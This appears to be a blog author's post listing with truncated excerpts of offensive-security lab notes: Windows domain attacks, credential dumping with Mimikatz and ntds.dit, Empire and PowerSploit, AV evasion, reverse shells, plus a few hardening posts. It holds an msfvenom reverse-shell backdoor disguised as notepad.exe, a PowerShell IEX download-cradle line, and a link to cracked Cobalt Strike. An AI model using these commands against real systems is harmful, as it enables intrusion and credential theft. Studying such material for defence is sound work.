Micr067
这个作者很懒,什么都没留下…
展开
-
缓冲区溢出实例(一)–Windows
一、基本概念缓冲区溢出:当缓冲区边界限制不严格时,由于变量传入畸形数据或程序运行错误,导致缓冲区被填满从而覆盖了相邻内存区域的数据。可以修改内存数据,造成进程劫持,执行恶意代码,获取服务器控制权限等。在Windows XP或2k3 server中的SLMail 5.5.0 Mail Server程序的POP3 PASS命令存在缓冲区溢出漏洞,无需身份验证实现远程代码执行。注意,Wi...原创 2019-03-12 20:18:42 · 1542 阅读 · 0 评论 -
本地提权汇总
本地提权已实现本地权限账号登录远程溢出直接获得账号密码系统账号之间的权限隔离操作系统安全的基础用户空间 user内核空间 system系统账号用户账号登陆时获取权限密码服务账号无需用户登录已在后台启动服务WindowsUserAdministrator:管理员具有绝大部分系统权限SystemLinuxUser‘ Rootnet user test...原创 2019-03-12 22:05:29 · 288 阅读 · 0 评论 -
COBAIT STRIKE
COBAIT STRIKE 3.14破解版:https://download.csdn.net/download/weixin_41082546/11604021客户端攻击重定向设置view —application 查看目标系统日志attack—web-drive-by—site clone在此之前需要先生成一段攻击代码钓鱼邮件实施 的4个阶段...原创 2019-08-24 17:47:53 · 573 阅读 · 0 评论 -
1.域渗透基础
一、域渗透基础1.域控:win server 20082.域内DC:win server 2008、win server 20033.域内PC:win7 x64、win7 x32、win xp1.域渗透基本命令ipconfig /all // 查询ip段,所在域等。net user // 本机用户列表net localgroup administrators // 本机管...原创 2019-08-28 00:00:32 · 452 阅读 · 0 评论 -
3-pass the ticket
pass the ticket在域环境中,Kerberos协议被用来作身份认证,这里仅介绍几个名词:KDC(Key Distribution Center): 密钥分发中心,里面包含两个服务:AS和TGSAS(Authentication Server): 身份认证服务TGS(Ticket Granting Server): 票据授予服务TGT(Ticket Granting T...原创 2019-08-29 00:12:27 · 288 阅读 · 0 评论 -
ntds.dit和SSP权限维持
Kerberos认证工作原理https://www.cnblogs.com/huamingao/p/7267423.html5.获取访问活动目录数据库文件的权限(ntds.dit)前提条件是获取域控权限:1.通过备份路径(备份服务器储存,媒体,网络共享)2 在准备配置成域控的服务器上找 NTDS.dit 文件3. 有虚拟机的管理权限,就能克隆虚拟的域控并离线获取数据4. 用 ...原创 2019-08-30 08:14:04 · 537 阅读 · 0 评论 -
Mimikatz on meterpreter
实验环境:kali 主机:192.168.88.193目标靶机:win2008 R2 192.168.88.130kali 主机上执行生成一个后门 exe:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.193 LPORT=443 -f exe -o notepad.exemsfconsole -r ...原创 2019-08-31 23:26:56 · 190 阅读 · 0 评论 -
域渗透-LSA Protection
简介:微软在 2014 年 3 月 12 日添加了 LSA 保护策略,用来防止对进程 lsass.exe 的代码注入,这样一来就无法使用 mimikatz 对 lsass.exe 进行注入,相关操作也会失败。微软官方文档:https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012...原创 2019-08-31 23:28:03 · 580 阅读 · 0 评论 -
PowerShell渗透–Empire
0x00 简介Empire是一款针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透攻击框架代码具有从stager生成,提权到渗透维持的一系列功能,无需powershell.exe就可以使用powershell的代理功能还可以快速在后期部署漏洞利用模块,内置模块有键盘记录,Mimikatz,绕过UAC,内网扫描等,可以躲避网络检测和大部分安全防护工具,类似于Meterp...原创 2019-10-24 00:46:01 · 179 阅读 · 0 评论 -
PowerShell渗透–Empire(二)
权限提升Bypass UACusemodule powershell/privesc/bypassuac设置listenerexecutelist查看usemodule powershell/private/bypassuac_wscript (win7)当运行完提权模块后,back返回agent...原创 2019-10-25 00:46:28 · 200 阅读 · 0 评论 -
PowerShell渗透–Empire(三)
会话注入我们可以使用usemodule management/psinject模块来进程注入,获取权限设置下Listeners和ProcID这2个参数,这里的ProcID就是之前的CMD的pid,反弹回域用户权限shellusemodule management/psinjectset Listener Micr067set ProcID 3768execute3.In...原创 2019-10-25 23:45:10 · 192 阅读 · 0 评论 -
PowerShell攻击:nishang
nishanhg下载地址:https://github.com/samratashok/nishing1.简介nishang的使用是要在PowerShell 3.0以上的环境中才可以正常使用。也就是说win7下是有点小问题的。因为win7下自带的环境是PowerShell 2.02.环境准备查看powershell版本get-host 或者 $PSVersionTable.P...原创 2019-10-26 23:11:01 · 542 阅读 · 0 评论 -
本地密码提取工具-LaZagne
简介:LaZagne项目是用于开源应用程序获取大量的密码存储在本地计算机上。每个软件都使用不同的技术(纯文本,API,自定义算法,数据库等)存储其密码。开发该工具的目的是为最常用的软件找到这些密码。该项目已作为开发后模块添加到pupy中。Python代码将在不接触磁盘的情况下在内存中进行解释,并且可以在Windows和Linux主机上运行。项目地址:https://github.c...原创 2019-11-13 21:32:12 · 2925 阅读 · 0 评论 -
免杀工具汇总
今天整理以前的笔记,把这部分工具整理了一下,虽然没有白利用稳,但这些工具也能在一定程度起到一定的免杀作用。DKMC项目地址:https://github.com/Mr-Un1k0d3r/DKMC可以创建一个 outputs 文件夹 存放 shellcode启动python dkmc.py操作顺序:Sc :是将 msf 生成的 raw 文件转换位 shellcode 代码...原创 2019-11-13 22:17:25 · 7225 阅读 · 0 评论 -
内网渗透之域渗透
1.初识域环境什么是域域是计算机网络的一种形式,其中所有用户帐户 ,计算机,打印机和其他安全主体都在位于称为域控制器的一个或多个中央计算机集群上的中央数据库中注册。 身份验证在域控制器上进行。 在域中使用计算机的每个人都会收到一个唯一的用户帐户,然后可以为该帐户分配对该域内资源的访问权限。 域(Domain)是将网络中多台计算机逻辑上组织到一起,进行集中管理,这种区别于工作组的逻辑环境叫...原创 2019-11-24 17:59:22 · 3197 阅读 · 0 评论 -
活动目录使用备忘单
活动目录使用备忘单包含 Windows 活动目录的常见枚举和攻击方法的备忘单。工具Powersploit PowerUpSQL Powermad Impacket Mimikatz Rubeus- >编译版本 BloodHound AD Module ASREPRoast枚举使用 PowerView 获取当前域:Get-NetDomain Enum 其他域:Get-NetDomain -Domain <DomainName> ...翻译 2020-07-20 20:53:14 · 313 阅读 · 0 评论 -
检测并移除WMI持久化后门
WMI型后门只能由具有管理员权限的用户运行。WMI后门通常使用powershell编写的,可以直接从新的WMI属性中读取和执行后门代码,给代码加密。通过这种方式攻击者会在系统中安装一个持久性的后门,且不会在磁盘中留下任何文件。 WMI型后门主要有两个特征:无文件和无进程。其基本原理是:将代码加密存储在WMI中,达到所谓的无文件;当设定的条件满足时,系统将自动启动powershell进程去执行...原创 2020-05-05 12:33:12 · 1153 阅读 · 0 评论 -
域控制器DSRM账户安全防护
一、DSRM简介 1.DSRM(Diretcory Service Restore Mode,目录服务恢复模式)是windows域环境中域控制器的安全模式启动选项。域控制器的本地管理员账户也就是DSRM账户,DSRM密码是在DC创建时设置的,一般很少更改。DSRM的用途是:允许管理员在域环境出现故障时还原、修复、重建活动目录数据库。通过在DC上运行ntdsutil 工具可以修改DSRM密码...原创 2020-05-05 12:32:25 · 1383 阅读 · 0 评论 -
AD域SSP安全防护
一、简介 SSP(Security Support Provider)是windows操作系统安全机制的提供者。简单的说,SSP就是DLL文件,主要用于windows操作系统的身份认证功能,例如NTLM、Kerberos、Negotiate、Secure Channel(Schannel)、Digest、Credential(CredSSP)。 SSPI(Security Suppor...原创 2020-05-05 12:31:10 · 1154 阅读 · 0 评论 -
SID History域权限维持
一、简介 每个用户都有自己的SID,SID的作用主要是跟踪安全主体控制用户连接资源时的访问权限,SID History是在域迁移过程中需要使用的一个属性。 如果A域中的域用户迁移到B域中,那么该用户的SID值就会改变,进而其权限也会改变。导致迁移后的用户无法访问以前可以访问的资源。SID History的作用是在域迁移过程中保持域用户的访问权限,如果迁移后用户的SID值改变,系统会将原...原创 2020-05-05 12:29:56 · 595 阅读 · 0 评论 -
使用卷影拷贝提取ntds.dit
一、简介 通常情况下,即使拥有管理员权限,也无法读取域控制器中的C:\Windows\NTDS\ntds.dit文件。使用windows本地卷影拷贝服务,就可以获得该文件的副本。 在活动目录中,所有的数据都保存在ntds.dit中。ntds.dit是一个二进制文件,存储位置为域控制器的%SystemRoot%\ntds\ntds.dit。ntds.dit中包含用户名、散列值、组、GPP...原创 2020-02-15 10:34:40 · 844 阅读 · 0 评论 -
导出ntds.dit中的散列值
1.下载NTDSXhttp://www.ntdsxtract.comgit clonehttps://github.com/csababarta/ntdsxtract安装python setup.py build && python setup.py install将导出的ntds.dit.export 文件夹中的datatable.3和link_table....原创 2020-02-15 10:32:33 · 370 阅读 · 0 评论 -
Exchange2010安装指南
安装流程参考下面的:https://jingyan.baidu.com/article/2c8c281d6893680008252a9c.htmlhttps://blog.csdn.net/StevenKind/article/details/86526622安装环境:windows server 2008(已安装Active Diretcory服务)1、安装域控制器2、安装n...原创 2020-02-14 15:22:03 · 325 阅读 · 0 评论 -
RAR、7-Zip在命令行下对数据进行压缩
3.6.1 RARWinrar的命令行模式程序在安装目录下的 rar.exe (打包压缩程序),unrar.exe(解压缩程序)RAR.exe的常用参数如下: -a 添加文件到压缩文件 -k 锁定压缩文件 -s 生成存档文件(这样可以提高压缩比) -p 指定压缩密码 -r 递归压缩,包括子目录 -x 指定要排除的文件 ...原创 2020-02-12 16:22:41 · 1125 阅读 · 0 评论 -
防范明文密码和散列值抓取
一、单机密码抓取的防范方法 微软为了防止用户密码在内存中以明文形式泄露,发不了补丁KB2871997,关闭了Wdigest功能。windows server 2012以上版本默认关闭Wdigest,使攻击者无法从内存中获取明文密码。对于win server 2012以下版本,通过安装KB2871997补丁,可以避免攻击者获取明文密码。 通过查看注册表键值,可以判断Wdigest功能状态...原创 2020-02-12 16:20:36 · 1259 阅读 · 0 评论 -
各种反弹shell方法总结备忘
各种反弹shell方法总结shell分为两种,一种是正向shell,另一种是反向shell。如果客户端连接服务器,客户端主动连接服务器,就称为正向shell。如果客户端连接服务器,服务器想要获得客户端的shell,就称为反向shell。反向shell通常在开启了防护措施的目标机器上,例如防火墙、端口转发等。(1)正向shell输入如下命令,监听目标主机的4444端口nc -lvp ...原创 2020-01-31 12:46:33 · 916 阅读 · 0 评论 -
PowerShell渗透--Empire(三)
PowerShell渗透--Empire(三)会话注入我们可以使用usemodule management/psinject模块来进程注入,获取权限设置下Listeners和ProcID这2个参数,这里的ProcID就是之前的CMD的pid,反弹回域用户权限shellusemodule management/psinjectset Listener Micr067set...原创 2019-10-25 23:55:56 · 279 阅读 · 0 评论 -
PowerShell渗透--Empire(二)
PowerShell渗透--Empire(二)权限提升 Bypass UAC usemodule powershell/privesc/bypassuac 设置listener execute list查看 usemodule powershell/private/bypassuac_wscript (win7) ...原创 2019-10-25 23:54:44 · 252 阅读 · 1 评论 -
PowerShell渗透--Empire
0x00 简介Empire是一款针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透攻击框架代码具有从stager生成,提权到渗透维持的一系列功能,无需powershell.exe就可以使用powershell的代理功能还可以快速在后期部署漏洞利用模块,内置模块有键盘记录,Mimikatz,绕过UAC,内网扫描等,可以躲避网络检测和大部分安全防护工具,类似于Meterpre...原创 2019-10-25 23:53:26 · 536 阅读 · 2 评论 -
PowerUp攻击模块实战
PowerUp攻击模块实战演练1.将PowerUp.ps1脚本上传至目标服务器,然后在本地执行2.使用IEX在内存中加载此脚本,执行以下命令,脚本将进行所有的检查。powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('C:\PowerUp.ps1'); Invoke-A...原创 2019-10-22 23:47:38 · 737 阅读 · 0 评论 -
PowerSploit 用法
PowerSploitPowerSploit是基于PowerShell的后渗透框架,包含很多PowerShell攻击脚本,主要用于渗透中的信息侦查,权限提升,权限维持,github地址为: https://github.com/PowerShellMafia/PowerSploit安装 下载程序目录 git clone https://github.com/PowerShellMa...原创 2019-10-22 00:19:38 · 1485 阅读 · 1 评论 -
powershell 基础
Windows powershell是一种命令行外壳程序和脚本环境,它内置在win7以上版本的操作系统中,使命令行用户和脚本编写者可以利用.NET Framework的强大功能。powershell程序可以直接在内存中运行,可以作为命令提示符cmd.exe的扩充。查看powershell版本信息Get-Host 或者 $PSVersionTable.PSVersion基...原创 2019-10-22 00:16:44 · 154 阅读 · 0 评论 -
Empire – PowerShell后渗透攻击框架
0x01 简介Empire是一个后渗透攻击框架。它是一个纯粹的PowerShell代理,具有加密安全通信和灵活架构的附加功能。Empire具有在不需要PowerShell.exe的情况下执行PowerShell代理的方法。它可以迅速采用可后期利用的模块,涵盖范围广泛,从键盘记录器到mimikatz等。这个框架是PowerShell Empire和Python Empire项目的组合; 这使得它...原创 2019-09-12 22:26:53 · 354 阅读 · 0 评论 -
frp实现内网穿透
项目地址:https://github.com/fatedier/frp/releases下载对应版本程序wget https://github.com/fatedier/frp/releases/download/v0.27.0/frp_0.27.0_linux_amd64.tar.gz解压rm -rf frpc*编辑frps配置文件vim frps.ini[co...原创 2019-08-26 12:41:58 · 242 阅读 · 0 评论